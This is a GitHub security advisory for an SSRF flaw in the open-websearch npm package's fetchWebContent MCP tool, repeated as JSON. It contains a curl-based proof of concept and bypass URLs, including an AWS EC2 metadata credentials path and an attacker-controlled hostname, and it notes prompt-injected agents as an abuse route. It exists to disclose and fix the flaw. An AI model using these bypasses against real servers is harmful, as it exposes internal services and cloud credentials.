GHSA-V228-72C7-FX8J

Vulnerability from github – Published: 2026-05-05 20:51 – Updated: 2026-05-13 16:24
VLAI
Summary
open-websearch has SSRF in `fetchWebContent` MCP tool: bracketed IPv6 literals and non-resolving hostname check bypass `isPrivateOrLocalHostname`
Details

Summary

src/utils/urlSafety.ts exposes isPublicHttpUrl / assertPublicHttpUrl, used to gate the MCP fetchWebContent tool against private-network targets. The check has two defects that together allow non-blind SSRF with the response body returned to the caller:

  1. Bracketed IPv6 literals are never recognized. Node's WHATWG URL.hostname keeps the surrounding […] for IPv6 literals. isIP("[::1]") returns 0 (not 6), so neither isPrivateIpv4 nor isPrivateIpv6 is ever called on an IPv6 literal input — including [::1] itself, and including every IPv4-mapped form such as [::ffff:7f00:1] (= 127.0.0.1 via the IPv4 stack).
  2. No DNS resolution. isPrivateOrLocalHostname only inspects the literal hostname string. It never resolves the host to an IP. Any attacker-controlled hostname whose DNS record points at 127.0.0.1 (or any RFC1918 / link-local address) passes the check unchanged, and axios then performs its own resolution and connects to the private address.

The isPrivateIpv6 implementation also has the hex bypass (it would miss ::ffff:7f00:1 even if reached) but defect (1) makes every bracketed IPv6 literal slip past before that branch is even entered.

The fetchWebContent tool returns the response body (JSON.stringify(result)) to the MCP caller, so the SSRF is non-blind.

Details

Vulnerable functionsrc/utils/urlSafety.ts:95-119:

export function isPrivateOrLocalHostname(hostname: string): boolean {
  const host = hostname.trim().toLowerCase();
  if (!host) return true;
  if (host === 'localhost' || host.endsWith('.localhost')) return true;
  if (host === 'metadata.google.internal' || host === 'metadata.azure.internal') return true;
  const integerIp = parseIntegerIpv4Literal(host);
  if (integerIp && isPrivateIpv4(integerIp)) return true;
  if (isPrivateOrLocalIp(host)) return true;   // only runs if isIP(host) ∈ {4, 6}
  return false;
}

isPrivateOrLocalIpsrc/utils/urlSafety.ts:84-93:

function isPrivateOrLocalIp(ip: string): boolean {
  const version = isIP(ip);  // returns 0 for "[::1]", "[::ffff:7f00:1]", any bracketed literal
  if (version === 4) return isPrivateIpv4(ip);
  if (version === 6) return isPrivateIpv6(ip);
  return false;
}

Caller — src/tools/setupTools.ts:252-286 (fetchWebContent tool):

server.tool(
  fetchWebToolName,  // default: "fetchWebContent"
  "Fetch content from a public HTTP(S) URL ...",
  { url: z.string().url().refine(
      (url) => validatePublicWebUrl(url),   // → isPublicHttpUrl → isPrivateOrLocalHostname
      "URL must be a public HTTP(S) address ..."
    ), /* … */ },
  async ({url, maxChars}) => {
    const result = await runtime.services.fetchWeb.execute({ url, maxChars, /*…*/ });
    return { content: [{ type: 'text', text: JSON.stringify(result, null, 2) }] };
  }
);

Service — src/engines/web/fetchWebContent.ts:313-375: re-validates via assertPublicHttpUrl (same broken check), then calls axios.head + axios.get on the raw URL and returns response.data and response.headers to the caller.

Transport — src/index.ts:85-253: when config.enableHttpServer is true (documented configuration; enabled by the Docker image), the MCP server binds on 0.0.0.0:${PORT} (default 3000) with CORS origin: '*' and no authentication on /mcp (Streamable HTTP) or /sse (legacy SSE). Anyone who can reach the port can invoke any tool.

Verification of the validator (run against current HEAD)

I executed the real isPublicHttpUrl / assertPublicHttpUrl from src/utils/urlSafety.ts under tsx against a set of inputs:

Input URL parsed.hostname isPublicHttpUrl assertPublicHttpUrl
http://[::ffff:7f00:1]/ (127.0.0.1) [::ffff:7f00:1] true ← bypass PASSED ← bypass
http://[::ffff:a9fe:1]/ (169.254.0.1) [::ffff:a9fe:1] true ← bypass PASSED ← bypass
http://[::ffff:a00:1]/ (10.0.0.1) [::ffff:a00:1] true ← bypass PASSED ← bypass
http://[::ffff:127.0.0.1]/ [::ffff:7f00:1] true ← bypass PASSED ← bypass
http://[0:0:0:0:0:0:0:1]/ [::1] true ← bypass PASSED ← bypass
http://[::1]/ (plain loopback!) [::1] true ← bypass PASSED ← bypass
http://127.0.0.1/ (control) 127.0.0.1 false (blocked) threw (blocked)
http://localhost/ (control) localhost false (blocked) threw (blocked)

WHATWG new URL("http://[::ffff:127.0.0.1]/").hostname returns [::ffff:7f00:1] — note that Node's URL parser actively re-encodes the dotted form to hex, helping the bypass. Every bracketed IPv6 literal passes the validator.

Verification of the fetch (Node 22/25)

I bound a trivial HTTP server to 127.0.0.1:29999 and called axios.get("http://[::ffff:7f00:1]:29999/") from Node; the request reached the server:

  HIT: / from 127.0.0.1 family IPv4
http://[::ffff:7f00:1]:29999/ -> 200 <html>internal content</html>

The OS routes ::ffff:X.X.X.X connections through the IPv4 stack, so the PoC works identically across macOS and Linux.

Environment: clean clone of Aas-ee/open-webSearch@HEAD, Node 22+.

1. Start the MCP HTTP server.

git clone https://github.com/Aas-ee/open-webSearch.git
cd open-webSearch
npm install && npm run build
MODE=http PORT=3000 node build/index.js &

2. Stand up a canary on loopback.

node -e '
  require("http").createServer((q,r)=>{
    console.log("[canary]", q.method, q.url, "from", q.socket.remoteAddress);
    r.writeHead(200, {"content-type":"text/html"});
    r.end("INTERNAL-SECRET: canary-hit for " + q.url);
  }).listen(19999, "127.0.0.1", () => console.log("canary on 127.0.0.1:19999"));
' &

3. Open an MCP session and call fetchWebContent with the bypass URL.

# Accept header must include both JSON and SSE for Streamable HTTP transport.
ACCEPT='application/json, text/event-stream'

# initialize → grab the mcp-session-id header
SID=$(curl -sSD - -o /dev/null -X POST http://127.0.0.1:3000/mcp \
  -H "Accept: $ACCEPT" -H 'Content-Type: application/json' \
  -d '{"jsonrpc":"2.0","id":1,"method":"initialize","params":{"protocolVersion":"2025-03-26","capabilities":{},"clientInfo":{"name":"poc","version":"0"}}}' \
  | awk 'tolower($1)=="mcp-session-id:" { gsub(/\r/,""); print $2 }')

# notifications/initialized
curl -sS -X POST http://127.0.0.1:3000/mcp \
  -H "Accept: $ACCEPT" -H 'Content-Type: application/json' -H "mcp-session-id: $SID" \
  -d '{"jsonrpc":"2.0","method":"notifications/initialized","params":{}}' >/dev/null

# call fetchWebContent with the SSRF bypass URL
curl -sS -X POST http://127.0.0.1:3000/mcp \
  -H "Accept: $ACCEPT" -H 'Content-Type: application/json' -H "mcp-session-id: $SID" \
  -d '{"jsonrpc":"2.0","id":2,"method":"tools/call","params":{
        "name":"fetchWebContent",
        "arguments":{"url":"http://[::ffff:7f00:1]:19999/internal","maxChars":10000}
      }}'

Expected result: the canary logs [canary] GET /internal from 127.0.0.1, and the MCP response contains INTERNAL-SECRET: canary-hit for /internal in the tool's content[0].text.

Additional bypass vectors that work the same way:

  • http://[::1]:<port>/ — plain IPv6 loopback.
  • http://[::ffff:a9fe:1]/latest/meta-data/iam/security-credentials/ — AWS EC2 metadata over the IPv4 stack.
  • http://attacker.example/ where attacker.example has A/AAAA pointing at any private address — bypasses via defect (2), no IPv6 trick needed.

Impact

  • Cross-tenant SSRF with full response body. Any client that can speak MCP to the HTTP transport can fetch arbitrary private-network URLs and receive the response body. AWS EC2 metadata, internal dashboards, loopback services, RFC1918 neighbours — all in scope.
  • Pre-auth when enableHttpServer is set. No authentication layer exists on /mcp or /sse; CORS is *.
  • DNS-rebinding / LAN-victim angle. Because /mcp is CORS * and accepts POST, a victim who visits an attacker-controlled webpage while running open-webSearch locally will have their browser used to send tool-call requests, and the tool's response can be exfiltrated back via a simple XHR.
  • Exploitable over stdio too. Even with HTTP disabled, a compromised or prompt-injected MCP client can call fetchWebContent against loopback on the host running the server — a realistic LLM-agent-abuse vector.

No meaningful mitigation in the call chain: only http:// and https:// schemes are accepted, but that is not a restriction for SSRF.

Suggested fix

Two changes, either of which individually closes most of the gap; both together close it fully.

  1. Normalize the hostname before IP checks, and perform a DNS resolution. Use the ip-address package or a similar canonicalizer, and reject any getaddrinfo result whose IP falls in a private CIDR. Keep a bracket-stripping step for IPv6 literals before calling isIP().

    ```ts import { lookup } from 'node:dns/promises'; import { Address4, Address6 } from 'ip-address';

    function stripBrackets(h: string): string { return h.startsWith('[') && h.endsWith(']') ? h.slice(1, -1) : h; }

    const BLOCKED_V6_CIDRS = [ '::1/128', '::/128', 'fc00::/7', 'fe80::/10', '2001:db8::/32', '2002::/16', '64:ff9b::/96', '100::/64', 'ff00::/8', '::ffff:0:0/96', // IPv4-mapped — delegate to v4 check ];

    function ipv6IsPrivate(addr6: Address6): boolean { const v4 = addr6.to4(); if (v4 && v4.isValid()) return isPrivateIpv4(v4.address); return BLOCKED_V6_CIDRS.some(cidr => addr6.isInSubnet(new Address6(cidr))); }

    export async function assertPublicHttpUrl(url: URL | string, label = 'URL') { const parsed = typeof url === 'string' ? new URL(url) : url; if (parsed.protocol !== 'http:' && parsed.protocol !== 'https:') throw …; const host = stripBrackets(parsed.hostname);

    // Literal IP case. const v = isIP(host); if (v === 4 && isPrivateIpv4(host)) throw …; if (v === 6 && ipv6IsPrivate(new Address6(host))) throw …;

    if (v === 0) { // Hostname — resolve and check every record. const records = await lookup(host, { all: true, verbatim: true }); for (const r of records) { if (r.family === 4 && isPrivateIpv4(r.address)) throw …; if (r.family === 6 && ipv6IsPrivate(new Address6(r.address))) throw …; } } } ```

  2. Dual-pin the connection. Even a perfect pre-connect check has TOCTOU gaps (DNS rebinding between check and axios.get). Use a custom undici Agent whose connect hook validates the actual connected socket IP via socket.remoteAddress. That closes the rebinding window.

  3. Gate the HTTP transport. Require a bearer token (env var) on /mcp and /sse, and restrict binding to 127.0.0.1 by default. CORS * plus no-auth on 0.0.0.0 is the same exposure profile as an unauthenticated open proxy.

Test vectors to add to the suite:

```ts for (const url of [ 'http://[::1]/', 'http://[::]/', 'http://[::ffff:127.0.0.1]/', 'http://[::ffff:7f00:1]/', 'http://[0:0:0:0:0:ffff:127.0.0.1]/', 'http://[0:0:0:0:0:0:0:1]/', 'http://[::0:1]/', 'http://[0:0::1]/', 'http://[::ffff:a00:1]/', 'http://[::ffff:c0a8:1]/', 'http://[::ffff:a9fe:1]/', ]) expect(isPublicHttpUrl(url)).toBe(false);

Severity
8.2 (High)
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N
Show details on source website
To clipboard 

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 2.1.6"
      },
      "package": {
        "ecosystem": "npm",
        "name": "open-websearch"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "2.1.7"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-42260"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-20",
      "CWE-693",
      "CWE-918"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-05-05T20:51:45Z",
    "nvd_published_at": "2026-05-12T15:16:15Z",
    "severity": "HIGH"
  },
  "details": "### Summary\n`src/utils/urlSafety.ts` exposes `isPublicHttpUrl` / `assertPublicHttpUrl`, used to gate the MCP `fetchWebContent` tool against private-network targets. The check has two defects that together allow **non-blind SSRF with the response body returned to the caller**:\n\n1. **Bracketed IPv6 literals are never recognized.** Node\u0027s WHATWG `URL.hostname` keeps the surrounding `[\u2026]` for IPv6 literals. `isIP(\"[::1]\")` returns 0 (not 6), so neither `isPrivateIpv4` nor `isPrivateIpv6` is ever called on an IPv6 literal input \u2014 including `[::1]` itself, and including every IPv4-mapped form such as `[::ffff:7f00:1]` (= 127.0.0.1 via the IPv4 stack).\n2. **No DNS resolution.** `isPrivateOrLocalHostname` only inspects the literal `hostname` string. It never resolves the host to an IP. Any attacker-controlled hostname whose DNS record points at 127.0.0.1 (or any RFC1918 / link-local address) passes the check unchanged, and `axios` then performs its own resolution and connects to the private address.\n\nThe `isPrivateIpv6` implementation also has the hex bypass (it would miss `::ffff:7f00:1` even if reached) but defect (1) makes every bracketed IPv6 literal slip past before that branch is even entered.\n\nThe `fetchWebContent` tool returns the response body (`JSON.stringify(result)`) to the MCP caller, so the SSRF is non-blind.\n\n### Details\n\u003c!-- obsidian --\u003e\u003cp\u003e\u003cstrong\u003eVulnerable function\u003c/strong\u003e \u2014 \u003ccode\u003esrc/utils/urlSafety.ts:95-119\u003c/code\u003e:\u003c/p\u003e\n\u003cpre\u003e\u003ccode class=\"language-ts\"\u003eexport function isPrivateOrLocalHostname(hostname: string): boolean {\n  const host = hostname.trim().toLowerCase();\n  if (!host) return true;\n  if (host === \u0027localhost\u0027 || host.endsWith(\u0027.localhost\u0027)) return true;\n  if (host === \u0027metadata.google.internal\u0027 || host === \u0027metadata.azure.internal\u0027) return true;\n  const integerIp = parseIntegerIpv4Literal(host);\n  if (integerIp \u0026#x26;\u0026#x26; isPrivateIpv4(integerIp)) return true;\n  if (isPrivateOrLocalIp(host)) return true;   // only runs if isIP(host) \u2208 {4, 6}\n  return false;\n}\n\u003c/code\u003e\u003c/pre\u003e\n\u003cp\u003e\u003ccode\u003eisPrivateOrLocalIp\u003c/code\u003e \u2014 \u003ccode\u003esrc/utils/urlSafety.ts:84-93\u003c/code\u003e:\u003c/p\u003e\n\u003cpre\u003e\u003ccode class=\"language-ts\"\u003efunction isPrivateOrLocalIp(ip: string): boolean {\n  const version = isIP(ip);  // returns 0 for \"[::1]\", \"[::ffff:7f00:1]\", any bracketed literal\n  if (version === 4) return isPrivateIpv4(ip);\n  if (version === 6) return isPrivateIpv6(ip);\n  return false;\n}\n\u003c/code\u003e\u003c/pre\u003e\n\u003cp\u003eCaller \u2014 \u003ccode\u003esrc/tools/setupTools.ts:252-286\u003c/code\u003e (\u003ccode\u003efetchWebContent\u003c/code\u003e tool):\u003c/p\u003e\n\u003cpre\u003e\u003ccode class=\"language-ts\"\u003eserver.tool(\n  fetchWebToolName,  // default: \"fetchWebContent\"\n  \"Fetch content from a public HTTP(S) URL ...\",\n  { url: z.string().url().refine(\n      (url) =\u003e validatePublicWebUrl(url),   // \u2192 isPublicHttpUrl \u2192 isPrivateOrLocalHostname\n      \"URL must be a public HTTP(S) address ...\"\n    ), /* \u2026 */ },\n  async ({url, maxChars}) =\u003e {\n    const result = await runtime.services.fetchWeb.execute({ url, maxChars, /*\u2026*/ });\n    return { content: [{ type: \u0027text\u0027, text: JSON.stringify(result, null, 2) }] };\n  }\n);\n\u003c/code\u003e\u003c/pre\u003e\n\u003cp\u003eService \u2014 \u003ccode\u003esrc/engines/web/fetchWebContent.ts:313-375\u003c/code\u003e: re-validates via \u003ccode\u003eassertPublicHttpUrl\u003c/code\u003e (same broken check), then calls \u003ccode\u003eaxios.head\u003c/code\u003e + \u003ccode\u003eaxios.get\u003c/code\u003e on the raw URL and returns \u003ccode\u003eresponse.data\u003c/code\u003e and \u003ccode\u003eresponse.headers\u003c/code\u003e to the caller.\u003c/p\u003e\n\u003cp\u003eTransport \u2014 \u003ccode\u003esrc/index.ts:85-253\u003c/code\u003e: when \u003ccode\u003econfig.enableHttpServer\u003c/code\u003e is true (documented configuration; enabled by the Docker image), the MCP server binds on \u003ccode\u003e0.0.0.0:${PORT}\u003c/code\u003e (default \u003ccode\u003e3000\u003c/code\u003e) with CORS \u003ccode\u003eorigin: \u0027*\u0027\u003c/code\u003e and \u003cstrong\u003eno authentication\u003c/strong\u003e on \u003ccode\u003e/mcp\u003c/code\u003e (Streamable HTTP) or \u003ccode\u003e/sse\u003c/code\u003e (legacy SSE). Anyone who can reach the port can invoke any tool.\u003c/p\u003e\n\u003ch3 data-heading=\"Verification of the validator (run against current \u0026#x60;HEAD\u0026#x60;)\"\u003eVerification of the validator (run against current \u003ccode\u003eHEAD\u003c/code\u003e)\u003c/h3\u003e\n\u003cp\u003eI executed the real \u003ccode\u003eisPublicHttpUrl\u003c/code\u003e / \u003ccode\u003eassertPublicHttpUrl\u003c/code\u003e from \u003ccode\u003esrc/utils/urlSafety.ts\u003c/code\u003e under \u003ccode\u003etsx\u003c/code\u003e against a set of inputs:\u003c/p\u003e\n\nInput URL | parsed.hostname | isPublicHttpUrl | assertPublicHttpUrl\n-- | -- | -- | --\nhttp://[::ffff:7f00:1]/ (127.0.0.1) | [::ffff:7f00:1] | true \u2190 bypass | PASSED \u2190 bypass\nhttp://[::ffff:a9fe:1]/ (169.254.0.1) | [::ffff:a9fe:1] | true \u2190 bypass | PASSED \u2190 bypass\nhttp://[::ffff:a00:1]/ (10.0.0.1) | [::ffff:a00:1] | true \u2190 bypass | PASSED \u2190 bypass\nhttp://[::ffff:127.0.0.1]/ | [::ffff:7f00:1] | true \u2190 bypass | PASSED \u2190 bypass\nhttp://[0:0:0:0:0:0:0:1]/ | [::1] | true \u2190 bypass | PASSED \u2190 bypass\nhttp://[::1]/ (plain loopback!) | [::1] | true \u2190 bypass | PASSED \u2190 bypass\nhttp://127.0.0.1/ (control) | 127.0.0.1 | false (blocked) | threw (blocked)\nhttp://localhost/ (control) | localhost | false (blocked) | threw (blocked)\n\n\n\u003cp\u003eWHATWG \u003ccode\u003enew URL(\"http://[::ffff:127.0.0.1]/\").hostname\u003c/code\u003e returns \u003ccode\u003e[::ffff:7f00:1]\u003c/code\u003e \u2014 note that Node\u0027s URL parser actively re-encodes the dotted form to hex, helping the bypass. Every bracketed IPv6 literal passes the validator.\u003c/p\u003e\n\u003ch3 data-heading=\"Verification of the fetch (Node 22/25)\"\u003eVerification of the fetch (Node 22/25)\u003c/h3\u003e\n\u003cp\u003eI bound a trivial HTTP server to \u003ccode\u003e127.0.0.1:29999\u003c/code\u003e and called \u003ccode\u003eaxios.get(\"http://[::ffff:7f00:1]:29999/\")\u003c/code\u003e from Node; the request reached the server:\u003c/p\u003e\n\u003cpre\u003e\u003ccode\u003e  HIT: / from 127.0.0.1 family IPv4\nhttp://[::ffff:7f00:1]:29999/ -\u003e 200 \u0026#x3C;html\u003einternal content\u0026#x3C;/html\u003e\n\u003c/code\u003e\u003c/pre\u003e\n\u003cp\u003eThe OS routes \u003ccode\u003e::ffff:X.X.X.X\u003c/code\u003e connections through the IPv4 stack, so the PoC works identically across macOS and Linux.\u003c/p\u003e\n\nEnvironment: clean clone of `Aas-ee/open-webSearch@HEAD`, Node 22+.\n\n**1. Start the MCP HTTP server.**\n\n```bash\ngit clone https://github.com/Aas-ee/open-webSearch.git\ncd open-webSearch\nnpm install \u0026\u0026 npm run build\nMODE=http PORT=3000 node build/index.js \u0026\n```\n\n**2. Stand up a canary on loopback.**\n\n```bash\nnode -e \u0027\n  require(\"http\").createServer((q,r)=\u003e{\n    console.log(\"[canary]\", q.method, q.url, \"from\", q.socket.remoteAddress);\n    r.writeHead(200, {\"content-type\":\"text/html\"});\n    r.end(\"INTERNAL-SECRET: canary-hit for \" + q.url);\n  }).listen(19999, \"127.0.0.1\", () =\u003e console.log(\"canary on 127.0.0.1:19999\"));\n\u0027 \u0026\n```\n\n**3. Open an MCP session and call `fetchWebContent` with the bypass URL.**\n\n```bash\n# Accept header must include both JSON and SSE for Streamable HTTP transport.\nACCEPT=\u0027application/json, text/event-stream\u0027\n\n# initialize \u2192 grab the mcp-session-id header\nSID=$(curl -sSD - -o /dev/null -X POST http://127.0.0.1:3000/mcp \\\n  -H \"Accept: $ACCEPT\" -H \u0027Content-Type: application/json\u0027 \\\n  -d \u0027{\"jsonrpc\":\"2.0\",\"id\":1,\"method\":\"initialize\",\"params\":{\"protocolVersion\":\"2025-03-26\",\"capabilities\":{},\"clientInfo\":{\"name\":\"poc\",\"version\":\"0\"}}}\u0027 \\\n  | awk \u0027tolower($1)==\"mcp-session-id:\" { gsub(/\\r/,\"\"); print $2 }\u0027)\n\n# notifications/initialized\ncurl -sS -X POST http://127.0.0.1:3000/mcp \\\n  -H \"Accept: $ACCEPT\" -H \u0027Content-Type: application/json\u0027 -H \"mcp-session-id: $SID\" \\\n  -d \u0027{\"jsonrpc\":\"2.0\",\"method\":\"notifications/initialized\",\"params\":{}}\u0027 \u003e/dev/null\n\n# call fetchWebContent with the SSRF bypass URL\ncurl -sS -X POST http://127.0.0.1:3000/mcp \\\n  -H \"Accept: $ACCEPT\" -H \u0027Content-Type: application/json\u0027 -H \"mcp-session-id: $SID\" \\\n  -d \u0027{\"jsonrpc\":\"2.0\",\"id\":2,\"method\":\"tools/call\",\"params\":{\n        \"name\":\"fetchWebContent\",\n        \"arguments\":{\"url\":\"http://[::ffff:7f00:1]:19999/internal\",\"maxChars\":10000}\n      }}\u0027\n```\n\nExpected result: the canary logs `[canary] GET /internal from 127.0.0.1`, and the MCP response contains `INTERNAL-SECRET: canary-hit for /internal` in the tool\u0027s `content[0].text`.\n\nAdditional bypass vectors that work the same way:\n\n- `http://[::1]:\u003cport\u003e/` \u2014 plain IPv6 loopback.\n- `http://[::ffff:a9fe:1]/latest/meta-data/iam/security-credentials/` \u2014 AWS EC2 metadata over the IPv4 stack.\n- `http://attacker.example/` where `attacker.example` has A/AAAA pointing at any private address \u2014 bypasses via defect (2), no IPv6 trick needed.\n\n### Impact\n\n- **Cross-tenant SSRF with full response body.** Any client that can speak MCP to the HTTP transport can fetch arbitrary private-network URLs and receive the response body. AWS EC2 metadata, internal dashboards, loopback services, RFC1918 neighbours \u2014 all in scope.\n- **Pre-auth when `enableHttpServer` is set.** No authentication layer exists on `/mcp` or `/sse`; CORS is `*`.\n- **DNS-rebinding / LAN-victim angle.** Because `/mcp` is CORS `*` and accepts `POST`, a victim who visits an attacker-controlled webpage while running open-webSearch locally will have their browser used to send tool-call requests, and the tool\u0027s response can be exfiltrated back via a simple XHR.\n- **Exploitable over stdio too.** Even with HTTP disabled, a compromised or prompt-injected MCP client can call `fetchWebContent` against loopback on the host running the server \u2014 a realistic LLM-agent-abuse vector.\n\nNo meaningful mitigation in the call chain: only `http://` and `https://` schemes are accepted, but that is not a restriction for SSRF.\n\n### Suggested fix\n\nTwo changes, either of which individually closes most of the gap; both together close it fully.\n\n1. **Normalize the hostname before IP checks, and perform a DNS resolution.** Use the `ip-address` package or a similar canonicalizer, and reject any `getaddrinfo` result whose IP falls in a private CIDR. Keep a bracket-stripping step for IPv6 literals before calling `isIP()`.\n\n    ```ts\n    import { lookup } from \u0027node:dns/promises\u0027;\n    import { Address4, Address6 } from \u0027ip-address\u0027;\n\n    function stripBrackets(h: string): string {\n      return h.startsWith(\u0027[\u0027) \u0026\u0026 h.endsWith(\u0027]\u0027) ? h.slice(1, -1) : h;\n    }\n\n    const BLOCKED_V6_CIDRS = [\n      \u0027::1/128\u0027, \u0027::/128\u0027,\n      \u0027fc00::/7\u0027, \u0027fe80::/10\u0027,\n      \u00272001:db8::/32\u0027, \u00272002::/16\u0027, \u002764:ff9b::/96\u0027,\n      \u0027100::/64\u0027, \u0027ff00::/8\u0027,\n      \u0027::ffff:0:0/96\u0027,   // IPv4-mapped \u2014 delegate to v4 check\n    ];\n\n    function ipv6IsPrivate(addr6: Address6): boolean {\n      const v4 = addr6.to4();\n      if (v4 \u0026\u0026 v4.isValid()) return isPrivateIpv4(v4.address);\n      return BLOCKED_V6_CIDRS.some(cidr =\u003e addr6.isInSubnet(new Address6(cidr)));\n    }\n\n    export async function assertPublicHttpUrl(url: URL | string, label = \u0027URL\u0027) {\n      const parsed = typeof url === \u0027string\u0027 ? new URL(url) : url;\n      if (parsed.protocol !== \u0027http:\u0027 \u0026\u0026 parsed.protocol !== \u0027https:\u0027) throw \u2026;\n      const host = stripBrackets(parsed.hostname);\n\n      // Literal IP case.\n      const v = isIP(host);\n      if (v === 4 \u0026\u0026 isPrivateIpv4(host)) throw \u2026;\n      if (v === 6 \u0026\u0026 ipv6IsPrivate(new Address6(host))) throw \u2026;\n\n      if (v === 0) {\n        // Hostname \u2014 resolve and check every record.\n        const records = await lookup(host, { all: true, verbatim: true });\n        for (const r of records) {\n          if (r.family === 4 \u0026\u0026 isPrivateIpv4(r.address)) throw \u2026;\n          if (r.family === 6 \u0026\u0026 ipv6IsPrivate(new Address6(r.address))) throw \u2026;\n        }\n      }\n    }\n    ```\n\n2. **Dual-pin the connection.** Even a perfect pre-connect check has TOCTOU gaps (DNS rebinding between check and `axios.get`). Use a custom `undici` `Agent` whose `connect` hook validates the actual connected socket IP via `socket.remoteAddress`. That closes the rebinding window.\n\n3. **Gate the HTTP transport.** Require a bearer token (env var) on `/mcp` and `/sse`, and restrict binding to `127.0.0.1` by default. CORS `*` plus no-auth on `0.0.0.0` is the same exposure profile as an unauthenticated open proxy.\n\nTest vectors to add to the suite:\n\n```ts\nfor (const url of [\n  \u0027http://[::1]/\u0027, \u0027http://[::]/\u0027,\n  \u0027http://[::ffff:127.0.0.1]/\u0027, \u0027http://[::ffff:7f00:1]/\u0027,\n  \u0027http://[0:0:0:0:0:ffff:127.0.0.1]/\u0027,\n  \u0027http://[0:0:0:0:0:0:0:1]/\u0027, \u0027http://[::0:1]/\u0027, \u0027http://[0:0::1]/\u0027,\n  \u0027http://[::ffff:a00:1]/\u0027, \u0027http://[::ffff:c0a8:1]/\u0027, \u0027http://[::ffff:a9fe:1]/\u0027,\n]) expect(isPublicHttpUrl(url)).toBe(false);",
  "id": "GHSA-v228-72c7-fx8j",
  "modified": "2026-05-13T16:24:33Z",
  "published": "2026-05-05T20:51:45Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/Aas-ee/open-webSearch/security/advisories/GHSA-v228-72c7-fx8j"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42260"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/Aas-ee/open-webSearch"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "open-websearch has SSRF in `fetchWebContent` MCP tool: bracketed IPv6 literals and non-resolving hostname check bypass `isPrivateOrLocalHostname`"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.




Forecast uses a logistic model when the trend is rising, or an exponential decay model when the trend is falling. Fitted via linearized least squares.

Sightings

Author Source Type Date Other

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.



Detection rules are retrieved from Rulezet.